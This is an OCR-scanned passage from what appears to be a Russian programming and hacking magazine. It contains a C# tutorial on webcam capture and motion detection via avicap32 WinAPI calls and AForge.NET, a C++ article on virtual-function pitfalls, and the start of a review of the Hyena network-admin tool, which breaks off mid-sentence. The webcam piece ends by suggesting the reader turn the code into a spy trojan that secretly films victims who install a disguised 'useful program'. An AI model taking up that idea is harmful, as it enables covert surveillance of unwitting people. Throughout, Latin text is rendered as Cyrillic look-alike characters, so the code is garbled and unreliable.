ПЕРВЫЕ ДОСАДНЫЕ ОГОРЧЕНИЯ 

Я был очень удивлен и расстроен, когда узнал, что в великом и 
могучем .ЫЕТ Ргатеѵѵогк напрочь отсутствует возможность простого 
взаимодействия с веб-камерами. В четвертой версии ситуация улучши- 
лась (для 5іІѵегІ_ідЫ-проектов точно появились соответствующие клас- 
сы], но протестировать я их не успел, поскольку пример для данной ста- 
тьи я начал писать еще до официального выхода Ѵ52010 и 4-го .ЫЕТ’а. 
Практически отчаявшись, я плотно засел в гугле. Результаты поиска 
по рунету меня не вдохновили — все, что я нашел — это ссылки на 
М50Ы и технологию ОігесЮгаѵѵ. Я даже попробовал набросать прос- 
тенький примерчик, но из-за отсутствия опыта работы с ОігесЮгаѵѵ 
меня постиг облом. У меня получилось собрать совсем простенькое 
приложение, но я так и не смог выловить в нем все глюки. Еще 
больше отчаявшись, я принялся шерстить ресурсы наших западных 
товарищей. Проштудировав несколько десятков ссылок, я смог нарыть 
много вкусностей. Среди них были всевозможные примеры и неболь- 
шие статейки (американцы не любят много писать]. Мне даже удалось 
найти рабочий пример на основе ОігесЮгаѵѵ, но когда я увидел код 
— ужаснулся. Разобраться в нем было тяжело. Поэтому я решил с ним 
не заморачиваться, а попытаться найти способ попроще. Не успел 
я распрощаться с примером на ОігесЮгаѵѵ, как на глаза мне попал- 
ся еще один. Автор примера закодил целую библиотеку для работы 
с веб-камерами и другими устройствами видеозахвата, используя 
технологию ѴЕѴѴ (Ѵібео Рог ѴѴіпсІоѵѵз]. Жаль, что проект автора (я про 
библиотеку] был максимально кастрирован. Все, что позволяла сде- 



лать библиотека — вывести изображение с веб-камеры. Ни захвата 
отдельных кадров, ни записи видео и других полезных нам фич не 
было. И тем не менее, мое подсознание решительно сказало мне, что 
этот проект и есть то, что я искал. Не успел я беглым взглядом про- 
бежаться по его коду, как увидел имена знакомых ѵѵіп-сообщений и не 
менее знакомых названий ѴѴіпАРІ функций. Когда-то давным-давно 
мне приходилось писать приложение для работы с веб-камерой на 
ОеІрЬі . Тогда я и столкнулся с этими функциями впервые. Посмотрев 
сорцы, я решил написать свою версию библиотеки и снабдить ее нуж- 
ным функционалом. 

ВЗВОД, ГОТОВНОСТЬ №1 

Вполне возможно, что в одном компе/ноуте может быть несколько 
веб-камер. За примером далеко ходить не надо. Мне по работе часто 
приходится организовывать простенькие видеоконференции. Обычно в 
них участвуют два человека. Каждого из участников снимает отдельная 
камера. Сами камеры подключены к моему компу. Когда я начинаю 
съемку, то выбираю в программе для работы с видеокамерами нуж- 
ную в настоящий момент камеру. Раз уж мы решили взять камеру под 
контроль, то обязаны разобраться, как получать список установленных 
устройств видеозахвата и выбрать то, с которым будем работать в 
настоящий момент. 

Для решения этой нехитрой задачи в ѴѴіпсІоѵѵзАРІ предусмотрена функ- 
ция сарбеЮгіѵеЮезсгірбопО. Она принимает пять параметров: 

1. ѵѵйгіѵегіпсіех — индекс драйвера видеозахвата. Значение индекса 
может варьироваться от 0 до 9; 
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Сэр, постороннихдвижений 
не обнаружено! 



2. ІрзгЫате — указатель на буфер, содержащий соответст- 
вующее имя драйвера; 

3. сЬЫате — размер (в байтах] буфера ІрзгЫате; 

4. ІрзгѴег — указатель на буфер, содержащий описание 
определенного драйвера; 

5. сЬѴег — размер буфера (в байтах], в котором хранится 
описание драйвера. 

В случае успешного выполнения функция вернет ТПІІЕ. 
Описание функции у нас есть, теперь посмотрим, как опре- 
делить ее в С#. Делается это так: 

[ВП І.трогі ( "аѵісар32 .сШ" ) ] 
ргоіесіесі 
зіаііс 

ехіегп Ъооі сарСеіВгіѵегБезсгірііопА ( 
зіюгі ѵДЗгіѵегІпсІех, 

[МагзЛаІАз (ІІптападесіТуре . ѴВВуКеіЗіг ) ] 
геі Зігіпд ІрззВате, 
іпС сЪВате, 

[МагзЬаІАз (ІІптападесіТуре . ѴВВуКеіЗіг) ] 
геі Зігіпд ІрззѴег, 
іпС сЪѴег) ; 

Обрати внимание, что перед тем, как указать имя подклю- 
чаемой функции, в обязательном порядке требуется напи- 
сать имя ОН, в которой она определена. В нашем случае 
это аѵісар32.сШ Так, функция импортирована, теперь можно 
написать класс, в котором она будет использоваться. Весь 
код класса для получения списка устройств я приводить не 
стану, покажу лишь код ключевого метода: 

риЫіс зіаііс Беѵісе[] 

СеіАІІСаріигезБеѵісез ( ) 

{ 

ЗСгіпд сЗИате = " " . РасІКідЬі (100) ; 

ЗСгіпд сіѴегзіоп = " " . РасіКідЬС (100 ) ; 

іог (зіюгі і = 0; і < 10; і++) 

{ 

іі (сарСеіБгіѵегБезсгірііопА ( і , 
геі сіііате, 100, 
геі сіѴегзіоп, 100)) 

{ 

Беѵісе сі = п еѵ7 Беѵісе(і); 




ѴѴіпАРІ в королевстве .ЫЕТ 



сІ.Вате = сіИате . Тгіт ( ) ; 
сі.Ѵегзіоп = сіѴегзіоп . Тгіт () ; 
сіеѵісез . Асісі (сі) ; 

} 

} 

геіигп ( Беѵісе [ ] ) сіеѵісез . ТоАггау ( 
іуреоі (Беѵісе) ) ; 

} 

Код выглядит проще некуда. Самое интересное 
место в нем — цикл, в котором происходит вызов 
упомянутой выше функции сарОеіОгіѵегОезсгірІйоп. 
Из М50Ы мы знаем, что индекс (первый параметр 
функции сарбеЮгіѵегОезсгірІіопП) может варьи- 
роваться от 0 до 9, поэтому мы целенаправленно 
запускаем цикл в этом диапазоне. Результатом 
выполнения метода будет массив классов Оеѵісе 
(этот класс я определил самостоятельно, смотри 
соответствующие исходники). 

С получением списка устройств разобрались, теперь 
позаботимся об отображении видеопотока с каме- 
ры. Тут нам сослужит хорошую службу функция 
сарСгеаІеСарІигеѴѴіпсІоѵѵО, предназначенная для создания 
окна захвата. 

Немного забегая вперед, скажу, что дальнейшие действия 
с камерой будут происходить путем банальной отправки 
сообщений окну захвата. Да, именно так, придется вос- 
пользоваться до боли знакомой ѵѵіпсіоѵѵз-программисту (и 
приколисту] функцией ЗепсІМеззадеО. 

Теперь присмотримся внимательнее к функции 
сарСгеаІеСарІигеѴѴіпсІоѵѵО. Ей требуется передать шесть 
аргументов: 

1. [рзгѴѴіпбоѵѵЫате — нуль-терминальная строка, содержа- 
щая имя окна захвата; 

2. сІѵѵЗіуІе — стиль окна; 

3. х — координата X; 

3. у — координата У; 

4. пѴѴісІіЬ — ширина окна; 

5. пНеідЫ: — высота окна; 

6. ЬѴѴпсІ — ЬапсІІе родительского окна; 

7. пЮ — идентификатор окна. 

Результатом выполнения функции будет ЬапсІІе 
созданного окна или І\ШІ_І_ в случае ошибки. 
Поскольку эта функция также относится к ѴѴіпАРІ, 
то ее опять-таки нужно импортировать. Код импор- 
тирования приводить не буду, поскольку он прак- 
тически идентичен тому, что я писал для функции 
сарОеЮгіѵегОезсгірЕопО. Лучше сразу взглянем на 
процесс инициализации камеры: 




НТТР://ѴѴѴШ 

■ I 

> Цпкб 

• Ыодз.тзбп.сот 

— Русская версия 
статьи «5і Іѵегіід Ы: 

4 геаі-бте Расе 
Оеіесбоп» (распозна- 
ваниелицв реальном 
времени при помощи 
ЗіІѵегЫдЫ:]. 

• ІасеІідЫ.сосІерІех. 
сот — здесь хостится 
проект«РасеІідЫ», 
позволяющий распо- 
знаватьлица в реаль- 
ном времени. Если 
ты собрался закодить 
серьезную софтину 
для определения лиц 
или логона в систему, 
то посмотреть на 
этот проект просто 
обязан. 

• уууууу.аЬгдепеР 
сотЛгатеѵѵогк — тут 

ты найдешь АРогде 
.ЫЕТ — отличный и 
простой в использо- 
вании фреймворкдля 
работы с видео, изо- 
бражениями и т.д. 

• ѵг-опііпе.ги — все 
исходники примеров, 
а также кучу дополни- 
тельной информации 
ты можешь слить с 
сайта проекта ѴП- 
Опііпе. 
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ССЮІЫ6 




Ахтунг! Обнаружено проникновение 
натерриторию! 

беѵісеНапбІе = сарСгеаіеСаріигеМіпбсжА ( 

геі беѵісеіпбех, МЗ_ѴІЗІВЬЕ I 1лГ8_СНІЬБ, О, О, 

тпботШібіЬ, іліпбоілНеідЪ.і , Папбіе, 0) ; 

іі (ЗепбМез заде (беѵісеНапбІе, 

ѴѴМ_САР_БКІ ѴЕК_СО№ІЕСТ , ііііз.іпбех, 0) >0) 

{ 

ЗепбМез заде (беѵісеНапбІе, Ш_САР_ЗЕТ_ЗСАЬЕ , -1, 0); 

ЗепбМез заде (сІеѵісеНапсіІе , Ш_САР_8ЕТ_РКЕѴІЕШ1АТЕ , 

0x42, 0); 

ЗепсІМеззаде (сІеѵісеНапсіІе, Ш_САР_ЗЕТ_РКЕѴІЕШ, -1, 0) ; 

ЗеШіпскхѵРоз (сІеѵісеНапсіІе, 1, 0, 0, 
ѵ\Мпбоѵ\МібіЬ., міпботлНеідйі , б); 

} 

В этом коде сразу после создания окна производится попытка 
отправки сообщения ѴѴМ_САР_ОВІѴЕВ_СОМЫЕСТ. Отличный от нуля 
результат выполнения функции расскажет нам о ее успешности. 
Теперь представим, что сегодня боги на нашей стороне и произведем 
незамедлительную отправку нескольких сообщений: ѴѴМ_САР_5ЕТ_ 
5САЕЕ, ѴѴМ_САР_5ЕТ_РВЕѴІЕѴѴВАТЕ, ѴѴМ_САР_5ЕТ_РВЕѴІЕѴѴ. Увы, 
как и в случае с функциями, С# ничего не знает о существовании 
этих констант. Тебе опять придется определять их самостоятельно. 
Список всех необходимых констант с комментариями я привел во 
врезке с соответствующим названием. Дальнейшее описание класса 
для работы с веб-камерой я опущу. Каркас я рассмотрел, а со всем 
остальным ты легко разберешься путем раскуривания моего хорошо 
прокомментированного исходника. Единственное, что я не хотел 
бы оставлять за кадром — это пример использования библиотеки. 
Всего в библиотеке я реализовал (точнее, дописал] пару методов: 
ОеШЮеѵісез (уже рассматривали), ОеЮеѵісе (получение драйвера 
устройства видеозахвата по индексу], ВЬоѵѵѴѴіпбоѵѵ (отображение 
изображения с веб-камеры), ОеіЕгате (захват отдельного кадра в 
графический файл] и ОеЮарІиге (захват видеопотока]. В качестве 
демонстрации работоспособности изготовленной либы я набросал 
небольшое приложение (показанное на скриншоте]. На форме я рас- 
положил один компонент СотЬоВох (используется для хранения 
списка имеющихся устройств видеозахвата] и несколько кнопок — 
«Обновить», «Пуск», «Остановить» и «Скриншот». Ах да, еще на моей 
форме пестреет компонент Ітаде. Его я применяю для отображения 
видео с камеры. Разбор полетов начнем с кнопки «Обновить». По ее 
нажатию я получаю список всех установленных устройств видеозах- 
вата. Начинка этого обработчика события: 




Необходимые константы 



//Пользовательское сообщение 
ргіѵаіе сог.зс іпі Ѵ\/М_САР = 0x400; 

//Соединение с драйвером устройства видеозахвата 
поп 8 С іпі Ѵ\/М_С А Р_ I Ж I ѴЕ К_С О NN К С Т = 0x4 0а; 
//Разрыв связи с драйвером видеозахвата 

- Ѵ\7М_С А Р_БК I ѴЕ К_Б 1 8 С (ЖБЕ С Т = 0x4 0Ъ; 
//Копирование кадра в буффер обмена 

юпзі іпі Ѵ\/М_САР_ЕБІТ_СОРУ = 0х41е; 

/ /Включение /отключение режима предпосмотра 

сопзі іпі Ѵ\7М_С АР_8 Е Т_РКЕ V I ЕѴ7 = 0x432 ; 

/ /Включение /отключение режима оверлей 

сопзі іпі Ш_САР_8ЕТ_ОѴЕКЬАУ = 0x433; 
//Скорость ргеѵіеѵпгаіе 

І Ѵ\7М_С АР_3 Е Т_РКЕ VI ЕШ1АТЕ = 0x434; 

/ /Включение /отключение масштабирования 

сопзі іпі Ѵ\/М_САР_8ЕТ_8САІ ,Е = 0x43 5; 
сопзі іпі №8_СНІІ Л) = 0x4000 0000; 
сопзі іпі Ѵ73_ѴІ8ІВЬЕ = 0x10000000; 
//Установка саІІЬаск-функции для ргеѵіеѵ^ 

і Ѵ\7М_С А Р_ 3 Е Т_С АЬ Ь ВАС К_Е КАМЕ = 0x405; 
//Получение одиночного фрейма с драйвера видеозах- 
вата 

сопзі іпі Ш_САР_СКАВ_ЕКАМЕ = 0x43с; 
//Сохранение кадра с камеры в файл 

сопзі іпі Ш_САР_8АѴЕБІВ = 0x419; 



Беѵісе [ ] беѵісез = БеѵісеМападег . СеіАІІБеѵісез ( ) ; 

іогеасй (Беѵісе б іп беѵісез) 

{ 

сшЬБеѵісез . Ііетз . Абб ( б) ; 

} 

Правда, все просто? Разработанная нами библиотека берет на себя 
все черную работу и нам остается лишь наслаждаться объектно- 
ориентированным программированием. Еще проще выглядит код для 
включения отображения видеопотока с камеры: 

Беѵісе зеІесіебБеѵісе = 

БеѵісеМападег . СеіБеѵісе (сшЬБеѵісез . Зеіесіебіпбех) ; 

зеІесіебБеѵісе . 8Ііоѵ\МіпбоѵЩіЪ.із .рісСаріиге) ; 

Опять же, все проще пареной репы. Ну и теперь взглянем на код кнопки 
«Скриншот»: 

Беѵісе зеІесіебБеѵісе = 

БеѵісеМападег .СеіБеѵісе (сшЬБеѵісез . Зеіесіебіпбех) ; 

зеІесіебБеѵісе . ЕгатеСгаЬЬег ( ) ; 

Я не стал уделять особого внимания методу ЕгатеСгаЬЬегО. В моем 
исходнике вызов метода приводит к сохранению текущего кадра прямо 
в корень системного диска. Разумеется, это не очень корректно, поэтому 
перед боевым применением программы не забудь внести все необходи- 
мые поправки. 

ГОТОВНОСТЬ №3 

Теперь поговорим о том, как соорудить простенькую, но надежную 
систему видеонаблюдения. Обычно такие системы базируются на двух 
алгоритмах: различие двух фреймов и простое моделирование фона. 

Их реализация (код] достаточно объемна, поэтому в самый последний 
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Делаем фотки одной кнопкой 



момент я решил пойти по более простому пути. Под легким путем 
подразумевается использование мощного, но пока малоизвестного 
фреймворка для .ІЧЕТ — АЕогде.ІЧЕТ. АЕогде.ІЧЕТ в первую очередь 
предназначен для разработчиков и исследователей. С его помощью 
девелоперы могут существенно облегчить свой труд при разработке 
проектов для следующих областей: нейросети, работа с изображениями 
(наложение фильтров, редактирование изображений, попиксельная 
фильтрация, изменение размера, поворот изображения], генетика, робо- 
тотехника, взаимодействие с видео устройствами и т.д. С фреймворком 
поставляется хорошая документация. В ней описаны абсолютно все воз- 
можности продукта. Не поленись хорошенько с ней ознакомиться. 
Особенно мне хочется отметить качество кода этого продукта. Все напи- 
сано цивильно и копаться в коде — одно удовольствие. 

Теперь вернемся к нашей непосредственной задаче. Скажу честно, 
средствами фреймворка она решается как дважды два. «Тогда зачем 
ты мне парил мозгѴѴіпАРІ функциями?» — недовольно спросишь ты. 
А за тем, чтобы ты не был ни в чем ограничен. Сам ведь знаешь, что 
проекты бывают разные. Где-то удобнее применить махину .ЫЕТ, а 
где-то проще обойтись старым добрым ѴѴіпАРІ. Вернемся к нашей 
задачке. Для реализации детектора движений нам придется вос- 
пользоваться классом МоІіопОеІесІог из вышеупомянутого фрейм- 
ворка. Класс отлично оперирует объектами типа Віітар и позволяет 
быстренько вычислить процент расхождения между двумя изобра- 
жениями. В виде кода это будет выглядеть примерно так: 

МоСіопБеСесСог сІеСесСог = пеѵ7 МоСіопБеСесСог ( 

пей ТѵгоРгатезБіРііегепсеВеСесСог ( ), 

пем МоВіопАгеаНідЫідІлВіпд ( ) ); 

//Обработка очередного кадра 
іі ( бебесбог ! = пи 11 ) 

{ 

біоаб шобіопЬеѵеІ = бебесбог . РгосеззРгаше ( ітаде ); 

іб ( тобіопЬеѵеІ > тобіопАІагтЬеѵеІ ) 

{ 

ТІазЪ. = (іпб) 

( 2 * ( 1000 / аІагтТітег . Іпбегѵаі ) ); 

} 

іб ( бебесбог .МобіопРгосеззіпдАІдогібЬт із 
ВІоЬСоипбіпдОЬпесбзРгосеззіпд ) 

{ 

ВІоЬСоипбіпдОЬпесбзРгосеззіпд соипбіпдВебесбог = 
(ВІоЬСоипбіпдОЬп есбзРгосеззіпд) 
бебесбог . МобіопРгосеззіпдАІдогібЬт; 
оЬз есбзСоипбЬаЬеІ .Техб = "Обдесбз: " + 

соипбіпдВебесбог .ОЬдесбзСоипб .ТоЗбгіпд ( ) ; 

} 

еізе 




Камера под нашим контролем 

{ 

оЬпесбзСоипбЬаЬеІ . Техб = 

} 

} 

Вышеприведенный код (не считая инициализацию класса 
МобопБеІюсІюг] у меня выполняется при получении очередного кадра 
с веб-камеры. Получив кадр, я выполняю банальное сравнение 
(метод РгосеззЕгате): если значение переменной тобопіеѵеі больше 
тобопЕеѵеІАІагт (0.01 51), то значит, надо бить тревогу! Движение обна- 
ружено. На одном из скришотов хорошо видна работа демонстрация 
детектора движений. 

ГОТОВНОСТЬ №4 

Веб-камеру можно запросто приспособить для распознавания лиц 
и создания продвинутого способа лог-она в систему? Если перева- 
рить весь этот материал, то не сложно! В конце марта на сайте Шр:// 
сосіеріех.сопп (хостинг для ОрепВоигсе проектов от МБ] появился 
пример (а затем и ссылка на статью], демонстрирующий реализацию 
программы для распознавания лиц с использованием веб-камеры. 
Сам пример основан на использовании новых возможностей .ЫЕТ 
и 5і ІѵегЫд Ы;. Разобрать этот пример в рамках журнальной статьи 
нереально, так как автор исходника постарался и сделал все макси- 
мально шикарно. Тут тебе и алгоритмы для работы с изображениями 
(фильтр размытия, уменьшения шума, попиксельное сравнение, рас- 
тяжка и т.д.) и демонстрация новинок ЗіІѵегЫдЫ: и много чего еще. 
Ссылку на проект и статью ищи во врезке. 

КОНЕЦ ФИЛЬМА 

Приведенные в статье примеры послужат тебе хорошей отправной 
точкой. На их основе легко сварганить профессиональную утилиту 
для работы с веб-камерой и поднимать на ее продаже несколько 
сотен баксов в квартал, или написать хитрого и злобного трояна- 
шпиона. Вспомни статью про бэкап 5куре-бесед. В ней я говорил, 
что времена клавиатурных шпионов уже прошли. Сейчас осо- 
бенно актуальны аудио и видеоданные. Если учесть, что сегодня 
веб-камера — обязательный атрибут любого ноутбука, то нетрудно 
представить, сколько интересного видео ты сможешь заснять, 
подсунув жертве «полезную программку»... Однако я тебе этого не 
говорил :]. Будут вопросы — пиши, т 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Правила кодинга на С++ для настоящих спецов 

ВСТРЕЧАЙ ОЧЕРЕДНОЙ СБОРНИК ПРАВИЛ КОДИНГА НА С++! С ЕГО 
ПОМОЩЬЮ ТЫ УЗНАЕШЬ. ЧТО НЕ НАДО ДЕЛАТЬ С ВИРТУАЛЬНЫМИ 
ФУНКЦИЯМИ. И ЧТО БУДЕТ. ЕСЛИ РИСКНУТЬ И НЕ ПРИСЛУШАТЬСЯ К 
МОИМ СОВЕТАМ. 



Виртуальные функции служат основой одного из столпов объектно- 
ориентированного программирования — полиморфизма. Реализация 
таких функций в С++ имеетсвои особенности, которые необходимо знать 
при разработке более-менее серьезных программ. Следующие два 
правила откроют нам пару подводных камней, связанных с виртуальны- 
ми функциями. 

Правило №1 

Основная суть первого правила заключается в том, что никогда нельзя 
переопределять наследуемое значение аргумента функции по умол- 
чанию. Объясняется это тем, что виртуальные функции связываются 
динамически, а значения аргументов по умолчанию — статически. Для 
того, чтобы лучше понять разницу между статическим и динамическим 
связыванием, рассмотрим следующий пример: 

Иерархия классов геометрических фигур 

сіазз "Зііаре { 
риЫіс : 

епит ЗііареСоІог { Кесі, Сгееп, Віие }; 

ѵігіиаі ѵоісі сігам ( ЗііареСоІог соіог = Кесі) сотзі = 0; 

} | 

сіазз КесСапдІе: риЫіс Зііаре { 
риЫіс : 

ѵігРиаІ ѵоісі сігам ( ЗііареСоІог соіог = Сгееп) сопзі; 

} ; 

сіазз Сігсіе: риЫіс Зііаре { 
риЫіс : 

ѵігіиаі ѵоісі сігахѵ ( ЗііареСоІог соіог) сопзС; 

} ; 

Вродебы ничего необычного — унасесть базовый классОЬаре, который 
определяет чисто виртуальную функцию рисования фигуры бгаѵѵ. Есть 
два класса, наследуемых отВЬаре — это Весіапдіе и Сігсіе. Каждый из 



наследников по-своему определяет поведение функции рисования. 
Теперь рассмотрим следующие указатели: 

Указатели на БИаре 

/ / Статический тип — Зііаре* 

Зііаре *рз; 

// Статический тип — Зііаре* 

Зііаре *рс = пем Сегсіе; 

// Статический тип — Зііаре* 

Зііаре *рг = пем КесСапдІе; 

В этом примере рз, рс и ргобъявлены какуказатели на 5Ьаре,такчто для 
всех них он и будет выступать в роли статического типа. Совершенно без 
разницы, на что они указывают в действительности — независимо от 
этого они имеют статический тип ВЬаре*. 

Динамический тип объекта определяется типом того объекта, на кото- 
рый он ссылается в данный момент, то естьдинамическийтип опреде- 
ляет поведение объекта. Например, динамический тип указателя рс 
— Сігсіе*, следовательно, вести себя он будет какобъекттипа Сігсіе, что 
вполне логично. Динамическиетипы могутменяться (обычно вследст- 
вие присваивания). 

Все эти основы поведения виртуальных функций секретом ни для 
кого не являются. Самое интересное начинается, когда мы подходим к 
виртуальным функциям с аргументами, принимающими значения по 
умолчанию. Так как виртуальные функции связываются динамически, а 
аргументы поумолчанию — статически, то мы получим очень необычное 
сочетание, которое приводит кстранным последствиям. 

Странное поведение 

// вызывается Сігсіе: : сТгам ( Зііаре : :КесІ) 
рс->сІгам ( Зііаре : :Кес1) ; 

// вызывается КесСапдІе: : сТгам ( Зііаре : :КесІ) 
рг->сігахѵ (Зііаре : :КесІ) ; 

// вызывается КесСапдІе: : сігам ( Зііаре : :Кес1) ! 
рг-хігахѵ ( ) ; 
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В этом случае динамический тип рг — это Ресіапдіе*, поэтому, какмы 
и ожидали, вызывается виртуальная функция класса Весіапдіе. Для 
функции РесІапдІе::сІгаѵѵ значение аргумента по умолчанию — Огееп. 

Но поскольку статический тип рг — 5Ьаре*,тозначения аргумента по 
умолчанию берутся из класса ЭЬаре, а не Ресіапдіе. Если бы рз, рс и рг 
были бы ссылками, ничего не изменилось. Важно лишь, что бгаѵѵ— вир- 
туальная функция, и значение поумолчанию одного из ее аргументов 
переопределено в производном классе. 

Почему стандарт С++ настаивает на таком странном поведении? 

Все достаточно просто. Если бы значения аргументов поумолчанию 
связывалисьдинамически.то компилятору пришлось бы найти способ 
определять во время исполнения, какое значение поумолчанию должно 
быть у параметра виртуальной функции, что по сравнению с нынешним 
механизмом медленнее итехнически сложнее. Решение было принято в 
пользу скорости и простоты реализации. 

Все это хорошо, но что получится, если, пытаясь следовать правилу, 
включить аргументы созначениями поумолчанию в функцию-член, 
объявленную и в базовом, и в производном классах? 

Следуем правилу 

сіазз ЗЬаре { 
риЫіс : 

епигп ЗЬареСоІог { Кесі, Сгееп, Віие }; 

ѵігВиаІ ѵоісі сЕгам (ЗЬареСоІог соіог = Кесі) сошзР = 0; 

} ; 

сіазз КесСапдІе: риЫіс ЗЬаре { 
риЫіс : 

ѵігСиаІ ѵоісі сігам (ЗЬареСоІог соіог = Кесі) сопзР; 

} ; 

Получится самое настоящее дублирование кода. Причем не 
просто дублирование, а дублирование с зависимостями. Если 
значение аргумента по умолчанию изменится в ЭЬаре, придется 
изменять его и во всех производных классах. В противном случае 
дело закончится переопределением наследуемого значения по 
умолчанию. 

В таких ситуациях лучше рассмотреть альтернативы виртуальным 
функциям. В предыдущей статье эти альтернативы были подробно 
освещены. Можно, например, воспользоваться так называемой 
идиомой невиртуального интерфейса ( N VI ) — определить в базо- 
вом классе открытую невиртуальную функцию, которая вызывает 
закрытую виртуальную функцию, переопределяемую в подклассах. 
Невиртуальная функция и будет получать аргументы, определенные 
по умолчанию. 

Правило №2 

Второе правило, о котором мы будем говорить, тесно связано с предыду- 
щим. Для начала допустим, что нам известно, что есть некий класс В, от 
которого открыто наследуется класс 0. В классе В определена функция 
ітіЕ Ее параметры и возвращаемый тип для нас не важны, поэтому пред- 
положим, что это просто ѵоісі. В коде это будет выглядеть примерно так: 

Класс и наследуется от В 

сіазз В { 
риЫіс : 

ѵоісі ші ( ) ; 



} ; 

сіазз Б: риЫіс В {...}; 

Как видно из кода, функция ті в базовом классе — невиртуальная. Если 
по каким-то причинам переопределить ее в производном классе, то при 
стечении некоторых обстоятельств мы можем получить очень странное 
поведение. 

Странное поведение 

сіазз Б: риЫіс В { 
риЫіс : 

// скрывает В: :ші 
ѵоісі ті ( ) ; 

} ; 

Б х; 

// получить указатель на х 
Б *рБ = &х; 

// вызываемая функция поведет себя как Б: :ші 
рБ->ті ( ) | 

// получить указатель на х 
В *рВ = &х; 

// вызываемая функция поведет себя как В: :ші 
//то есть не так как мы этого ожидаем 
рВ->ші ( ) ; 

Здесь мы имеем объект типа 0, на который ссылаются два указателя: В 
*рВ и 0 *р0. При вызове функции ті через указатель рО мы получим то, 
что и ожидали — вызовется переопределенная в производном классе 
версия функции. Но если обращаться кфункции посредством указателя 
рВ, то сработает код определенной в базовом классе тЕ 
Причинатакого поведения заключается втом, что невиртуальные функ- 
ции, подобные В : :ті и ИзтЕ связываются статически. Это означает, что, 
когда рВ объявляется какуказатель на объекттипа В, невиртуальные 
функции, вызываемые посредством рВ — это всегда функции, опреде- 
ленные в классе В, даже если указатель (как в примере выше] указывает 
на объект класса, производного от В. 

Виртуальныеже функции связываются динамически, поэтому для них 
не существует та кой проблемы. Виртуальная версия функции ті при вы- 
зове через указатель на класс В или же через указатель на класс всегда 
работала бы правильно, так, какожидается. То есть выполнялось бы 
тело функции 0::тТ потому что в действительности рВ и рЭ указывают 
на объекттипа 0. 

В итоге, если мы пишем класс 0 и переопределяем невиртуальную 
функцию гтф наследуемую от класса В, есть вероятность, что объекты 
класса Э будут вести себя совсем не так, какмы ожидаем. В частности, 
любой конкретный объект Э может вести себя при вызове тілибо как 
О, либо как В, причем определяющим фактором будет нетип самого 
объекта, а лишьтип указателя на него. При этом ссылки будут вести себя 
ничуть не лучше. 

Заключение 

На этом наше повествование о виртуальных функциях можно считать 
законченным. На протяжении нескольких статей мы постарались 
рассказатьтебе обо всех возможностях (и невозможностях] виртуаль- 
ности в С++ и теперь можем бытьуверены, что любой баг, связанный с 
виртуальными функциями, ты отловишьоченьбыстро. И еще быстрее 
устранишь. пт 
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■ ■ Сергей «дгіпсіег» Яремчук дгіпгіеггазупаск.ги 



Сделай ставку 
на хищника 



5 



ЭФФЕКТИВНОЕ АДМИНИСТРИРОВАНИЕ СРЕДНИХ И КРУПНЫХ 
ЛОКАЛЬНЫХ СЕТЕЙ С ПОМОЩЬЮ НѴЕЫА8.0 

Централизованное управление настройками систем снимаете админа 
множество проблем, а главное -упрощает сам процесс, ведь все опера- 
ции производятся из одного места. Готовых решений, втом числе пред- 
лагаемых МісгозоЙ, сегодня более чем достаточно, каждое имеетсвою 
фишку, которая выделяет продукт среди прочих и привлекает сторонни- 
ков. Но Нуепа занимает в этом ряду особое место. 



ВОЗМОЖНОСТИ НУЕЫА 

Начинающие сисадмины считают, что 
настраивать компы в локалке проще при по- 
мощи удаленного рабочего стола. В ѴѴіпсІоѵѵз 
уже встроена такая функция, кроме того, есть 
множество программ от сторонних разработ- 
чиков: Кабтіп, рсАпуѵѵѣеге, Неюр, ШггаѴІЧС 
и так далее. Отчасти это так. Но если систем 
много, для того, чтобы изменить хотя бы одну 
настройку, придется подключаться к рабо- 
чему столу каждого компьютера, шустрить 
мышкой, проверять установки. Более опыт- 
ные админы используют средства «массово- 
го» управления, такие как ѴѴіпКМ, РоѵѵегЗЬеІІ 
и 5ССМ. Популярны и групповые политики 
(СРО), позволяющие одним щелчком мышки 
выполнить нужную установку на всех систе- 
мах. Хотя СРО не очень наглядны, и в сетях 
большого размера с несколькими доменами 
весьма непросто отслеживать все настройки 
и быть уверенным, что тот или иной компью- 
тер находится в требуемом состоянии. 
Программа централизованного управления 
подчиненными системами Нуепа по своим 
возможностям находится где-то посередине 
между всеми этими инструментами, позволяя 
отдавать команды, а при необходимости и 
подключаться к рабочему столу удаленной сис- 
темы. Разработчики из ЗузНетТооІз Зойѵѵаге 
Іпс. ( зѵзЕетШоІз . сот) поставили своей целью 
создать простой в использовании и понятный 
продукт, который позволял бы управлять ком- 
пьютерами в сети любого размера и не требо- 
вал от админа каких-либо особых знаний или 
обучения. И, судя по тому, что Нуепа пользует- 
ся популярностью у десятков тысяч админист- 
раторов по всему миру, им это удалось. 

► ііб 



Для выполнения любых операций при- 
ложение использует пользовательский 
интерфейс в стиле виндового Проводника 
с удобным всплывающим контекстным 
меню и горячими клавишами. Нуепа соче- 
тает в себе функции стандартных средств 
администрирования ѴѴіпНТ: ІІзег Мапа^ег, 
Зегѵег Мапа^ег и Рііе Мапа^ег/Ехріогег, 
а также и большую часть возможностей, 
заложенных в консоли управления ММС. Но 
теперь не придется лазать по разным меню, 
все это доступно в одном окне. Конечно же, 
реализованы все стандартные операции по 
управлению учетными записями пользо- 
вателей и групп (локальными и домена), 
правами, компьютерами, устройствами, 
печатью. По сравнению с ММС все действия 
более наглядны, кроме того легко переклю- 
читься сразу на другую систему, например, 
для сравнения результата. Выбрав в списке 
любой компьютер, можно просмотреть спи- 
сок процессов, открытых файлов, сетевых 
соединений и многое другое. При наличии 
домена Нуепа тесно интегрируется в его 
структуру, позволяя управлять основными 
настройками. Параметры и отчеты при 
необходимости экспортируются в файлы 
М5 Ассезз и Ехсеі. Кроме стандартной 
версии предлагается еще и Етегргізе-ва- 
риант, в котором добавлены возможнос- 
ти управления сервером терминалов и 
сессиями пользователей (в стандартной 
версии она тоже есть, но работает только 
30 дней), почтовыми ящиками ЕхсЬап^е 
Зегѵег 5.5/2000/2003, плюс реализована 
интеграция с инструментарием ѴѴМІ. Нуепа 
может быть использована для управления 



компьютерами, работающими с любой 
версией ѴѴіпсІоѵѵз на ядре Ш 1 от 2000 и выше. 
В восьмом релизе добавлена поддержка ѴѴіп7 
и ѴѴіп2к8К2. Также именно с этого релиза 
появилась поддержка х64-платформ, объек- 
тов политик паролей (Р50, Разздлгогсі Зетп^з 
Оіцесиз), которые стали доступны в ѴѴіп2к8 
и позволяют устанавливать несколько поли- 
тик паролей в домене. 

До версии 8.x для удаленных соединений 
по КБР и ѴЛС приходилось использовать 
еще и сторонние продукты, что было весьма 
